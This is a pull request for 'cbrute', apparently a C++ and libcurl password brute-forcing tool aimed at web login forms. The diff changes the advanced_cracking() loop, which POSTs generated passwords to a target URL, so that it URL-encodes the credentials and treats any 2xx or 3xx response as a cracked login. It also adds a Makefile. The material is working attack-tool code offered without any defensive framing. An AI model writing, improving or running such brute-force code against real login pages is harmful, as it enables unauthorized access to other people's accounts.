### PR TITLE
Fix status code checking and urlencoding

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,3 @@
+cbrute
+.vscode
+build

--- a/Makefile
+++ b/Makefile
@@ -1,0 +1,2 @@
+default:
+	g++ -Wall -lcurl cbrute.cpp -o cbrute

--- a/README.md
+++ b/README.md
@@ -18,6 +18,7 @@ CBRute.exe target https://example.com
 
 If you would like to build from source, you'd first need to have a c++ compiler and curl installed. <a href="https://stackoverflow.com/questions/53861300/how-do-you-properly-install-libcurl-for-use-in-visual-studio-2017">Heres </a> a tutorial on how you can install curl. Afterwards just download the cbrute.cpp and build.
 
+To build using make, run ```make```
 
 # Donate
 

--- a/cbrute.cpp
+++ b/cbrute.cpp
@@ -236,10 +236,14 @@ void advanced_cracking() {
         if (curl) {
             std::string user = target;
             std::string password = generate_password();
-            std::string data = "user=" + user + "&pass=" + password;
+
+            // obtain user data and url-encode it
+            std::string url_user(curl_easy_escape(curl,user.c_str(),0));
+            std::string url_password (curl_easy_escape(curl,password.c_str(),0));
+            std::string data = "user=" + url_user + "&pass=" + url_password;
 
             curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
-            curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data.c_str());
+            curl_easy_setopt(curl, CURLOPT_POSTFIELDS, data.c_str()); 
 
             curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, discard_data_callback);
 
@@ -251,7 +255,7 @@ void advanced_cracking() {
 
             long http_code = 0;
             curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
-            if (http_code == 200) {
+            if (http_code >=200 && http_code < 400) {
 
                 std::cout << password;
                 found_pass = password;


### PR DESCRIPTION
- Since websites could give any status code from 200 to 399 for a successful login, code was changed to account for it.
- CURLOPT_POSTFIELDS doesn't automatically url-encode passwords and usernames, so code was changed to do that : https://curl.se/libcurl/c/CURLOPT_POSTFIELDS.html
- added a Makefile.